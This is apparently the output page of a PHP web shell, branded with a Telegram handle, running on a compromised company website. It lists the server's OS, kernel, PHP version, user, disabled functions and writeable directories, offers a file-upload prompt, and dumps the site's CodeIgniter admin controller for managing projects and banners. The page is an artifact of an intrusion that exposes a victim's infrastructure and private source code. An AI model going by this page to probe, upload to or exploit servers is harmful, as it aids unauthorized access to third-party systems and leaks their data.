https://t.me/RX1948
Server : Apache/2.4.18 (Ubuntu)
System : Linux canvaswebdesign 3.13.0-71-generic #114-Ubuntu SMP Tue Dec 1 02:34:22 UTC 2015 x86_64
User : oppastar ( 1041)
PHP Version : 7.0.33-0ubuntu0.16.04.15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Directory :  /var/www/kokohpondasi.co.id/public_html/application/controllers/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/kokohpondasi.co.id/public_html/application/controllers/admin/Project.php
<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');

class Project extends Admin_Controller {

	private $project_current_id;

	private $image1_filename = NULL;
	private $image2_filename = NULL;
	private $image3_filename = NULL;
	private $image4_filename = NULL;
	private $image5_filename = NULL;
	private $image6_filename = NULL;

	function __construct() { 
		parent::__construct();	
		$this->load->model('product_m');
		$this->load->model('project_m');  
		$this->load->model('category_m'); 
		$this->load->model('brand_m'); 
		$this->load->model('size_m');  
		$this->load->library('image_lib');
		$this->load->helper('form');
	}



	public function index(){
		$this->db->select('*');
		$this->db->from('configuration');
		$data['config'] = $this->db->get()->result();

		foreach ($data['config'] as $item) {
			$this->data_header['image'] = $item->logo;
			$this->data_header['icon'] = $item->website_icon;
		}
		/*----FILTER SEARCH PRODUCT--*/
		if(isset($_POST['search_project'])) { 

			//get product name from form
			$this->data['keyword'] = $this->security->xss_clean($this->input->post('project'));
			$this->data['project'] = $this->product_m->get_all_products_search_product($this->data['keyword']); 

		} elseif (isset($_POST['updateBanner'])) {

			$this->imageupload_indexpage = TRUE;

			//get max image width and height from configuration table
			$this->db->select('category_image_width, category_image_height')->from('configuration')->where('id_configuration', 1);
			$image_dimension = $this->db->get()->row();

			//check & processing image banner upload files	
			if ($_FILES['userfile']['size'] !== 0) {  
			
				$config['upload_path'] = './uploads/banners/'; 
				$config['allowed_types'] = 'jpeg|jpg|png'; 
				$config['max_size']	= '1024';
				$config['max_width'] = $image_dimension->category_image_width;
				$config['max_height'] = $image_dimension->category_image_height;
				
				$this->load->library('upload', $config); 


				if ( ! $this->upload->do_upload('userfile')) {
					//echo $this->upload->display_errors(); die();

					$this->session->set_flashdata('banner_error', '<br>
						<p style="background:orange; color:white; padding:5px; font-weight:bold;">Image Upload Error. Wrong format or size.</p>');

					redirect('admin/project/index');
				
				} else {
					$image = $this->upload->data();
					$image_filename = $image['file_name']; 	 
				}	
			}

			//store image information to configuration table
			$data = array(
				'category_landingpage_link' => $this->security->xss_clean($this->input->post('banner_link'))
			);

			//image upload
			if (isset($image_filename)) {
				$data['category_landingpage_image'] = $image_filename; 
			} 

			$this->db->where('id_configuration', 1);
			$this->db->update('configuration', $data); 

			$this->session->set_flashdata('success', '<br><p style="background:green; color:white; padding:5px; font-weight:bold;">Projects Landing Page Edit Successful</p>');

		}

		//get landingpage banner image, description and link
		$this->db->select('category_landingpage_description, category_landingpage_image, category_landingpage_link')->from('configuration')->where('id_configuration', 1);
		$this->data['category_landingpage'] = $this->db->get()->row();

		//pagination in action. 100 results per page
		$this->load->library('pagination');
		$config = array();
		$this->load->helper('pagination_helper');
		$config = pagination_format(); //function from helper file
		$config['base_url'] = base_url() . 'admin/project/index/';
		$config['per_page'] = 100;
		$config['uri_segment'] = 4; 
		$config['total_rows'] = $this->project_m->record_count(); 
		$this->pagination->initialize($config);
		$this->data['project'] = $this->project_m->get_all_project($config['per_page'],$this->uri->segment($config['uri_segment']));  
		$this->data['use_pagination'] = 'yes';


		//get website product ordering
		$this->db->select('website_product_ordering')->from('configuration')->where('id_configuration', 1);
		$this->data['website_product_ordering'] = $this->db->get()->row()->website_product_ordering;

		//load view
		$this->data['subview'] = 'admin/project/index';
		$this->load->view('admin/templates/header', $this->data_header); 
		$this->load->view('admin/_layout_main', $this->data);
		$this->load->view('admin/templates/footer'); 
	}

	public function delete_landingpage_image(){
		//get image file name for deletion
		$this->db->select('category_landingpage_image')->from('configuration')->where('id_configuration', 1);
		$image = $this->db->get()->row()->brand_landingpage_image;

		//Delete the actual image file from server. FCPATH is codeigniter base path
		unlink(FCPATH .'/uploads/blog/'. $image);

		//Delete image field from database
		$data = array( 
			'category_landingpage_image' => '',
		);

		$this->db->where('id_configuration', 1);
		$this->db->update('configuration', $data);	

		$this->session->set_flashdata('success', '<br><p style="background:green; color:white; padding:5px; font-weight:bold;">Image Delete Successful</p>');
		
		redirect('admin/project'); 
	}

	public function add(){

		$this->data['project'] = $this->project_m->get_new(); 	
		$this->data['parent_categories'] = $this->category_m->get_parent_categories();   
		$this->data['brands'] = $this->brand_m->get_brands();   
		$this->data['sizes'] = $this->size_m->get_product_size(); 
		$this->data['new_product'] = TRUE;

		//get ordering number and display at add form
		$this->db->select_max('priority')->from('project');
		$current_priority = $this->db->get()->row()->priority;
		if($current_priority == NULL) {
			$this->data['project']->priority = 1;	
		} else {
			$this->data['project']->priority = $current_priority + 1;
		}

		//validation in action 
		//validation check in action
		$config = $this->project_m->rules; 
		$this->load->library('form_validation');

		$this->form_validation->set_error_delimiters('<div class="error">', '</div>'); //above is to add class to form validation error, to be styled  
		$this->form_validation->set_rules($config);
		if ($this->form_validation->run($this) == TRUE) {
				
			$data = $this->table_data_processing(
			$this->input->post('project_name'),
			$this->input->post('project_type'),
			$this->input->post('project_status'),
			$this->input->post('priority'),
			$this->input->post('glass_material'),
			$this->input->post('city'),
			$this->input->post('year')
			);

			$project_id = (int) $this->project_m->add_project($data);

			$this->session->set_flashdata('success', '<br><p style="background:green; color:white; padding:5px; font-weight:bold;">Project Added Successful</p>');
			redirect('admin/project');

			//get category_id from view, then insert together with product_id to category_product table
			

			
		}

		$this->db->select('*');
		$this->db->from('configuration');
		$data['config'] = $this->db->get()->result();

		foreach ($data['config'] as $item) {
			$this->data_header['image'] = $item->logo;
			$this->data_header['icon'] = $item->website_icon;
		}

		$this->data['subview'] = 'admin/project/edit';
		$this->load->view('admin/templates/header', $this->data_header); 
		$this->load->view('admin/_layout_main', $this->data);
		$this->load->view('admin/templates/footer'); 

	}

	public function edit($id){

		$this->db->select('id')->from('project')->where('id', $id);
		$count_product = $this->db->get()->num_rows();
		if($count_product === 0) {show_404();}

		$this->data['project'] = $this->project_m->get($id);  
		$this->data['parent_categories'] = $this->category_m->get_parent_categories();

		//get all chosen (active) categories
		$this->db->select('*')->from('category_project')->where('id', $id);
		$this->data['chosen_categories'] = $this->db->get()->result();

		//assign to properties, used for custom callback validation
		$this->project_current_id = (int) $this->data['project']->id;

		//validation check in action
		$config = $this->project_m->rules;
		$this->load->library('form_validation');
		$this->form_validation->set_error_delimiters('<div class="error">', '</div>'); 

		//above is to add class to form validation error, to be styled
		$this->form_validation->set_rules($config); 
		$this->form_validation->set_error_delimiters('<div class="error">', '</div>');

		if ($this->form_validation->run($this) == TRUE) {
			
			$data = $this->table_data_processing(
			$this->input->post('project_name'),
			$this->input->post('project_type'),
			$this->input->post('project_status'),
			$this->input->post('priority'),
			$this->input->post('glass_material'),
			$this->input->post('city'),
			$this->input->post('year')
			);

			$this->project_m->edit_project($id, $data);

			$this->session->set_flashdata('success', '<br><p style="background:green; color:white; padding:5px; font-weight:bold;">Project Edit Successful</p>');
			redirect('admin/project/edit/' . $id);
		}

		$this->db->select('*');
		$this->db->from('configuration');
		$data['config'] = $this->db->get()->result();

		foreach ($data['config'] as $item) {
			$this->data_header['image'] = $item->logo;
			$this->data_header['icon'] = $item->website_icon;
		}

		$this->data['subview'] = 'admin/project/edit';
		$this->load->view('admin/templates/header', $this->data_header); 
		$this->load->view('admin/_layout_main', $this->data);
		$this->load->view('admin/templates/footer'); 
	}

	public function delete ($id) {

		//check if id exist. If not exist, show 404.
		$count = $this->project_m->count_exist($id);

		if ($count == 0) {  
			//page not exist 
			show_404();
		}

		$this->project_m->delete($id);

		$this->session->set_flashdata('success', '<br><p style="background:green; color:white; padding:5px; font-weight:bold;">Project Deleted Successful</p>');
		redirect('admin/project');


	}

	//callback function validation add new product
	public function _cek_existing_project_name($str) {

		$num_rows = $this->project_m->cek_existing_project_name($str, $this->project_current_id);   

		if ($num_rows != 0 ) { 
			$this->form_validation->set_message('_cek_existing_project_name', 'Project name already exist !');
			return FALSE;
		} else {
			return TRUE; 
		}
	}

	private function table_data_processing($project_name,$project_type,$project_status,$priority,$glass_material,$city,$year){

		$data = array(
			'project_name' => $this->security->xss_clean($project_name),
			'project_type' => $this->security->xss_clean($project_type),
			'glass_material' =>$this->security->xss_clean($glass_material),
			'city' => $this->security->xss_clean($city),
			'project_status' => $this->security->xss_clean($project_status),
			'priority' => $this->security->xss_clean($priority),
			'year' => $this->security->xss_clean($year),

		);

		return $data;
	}

}
?>

https://t.me/RX1948 - 2025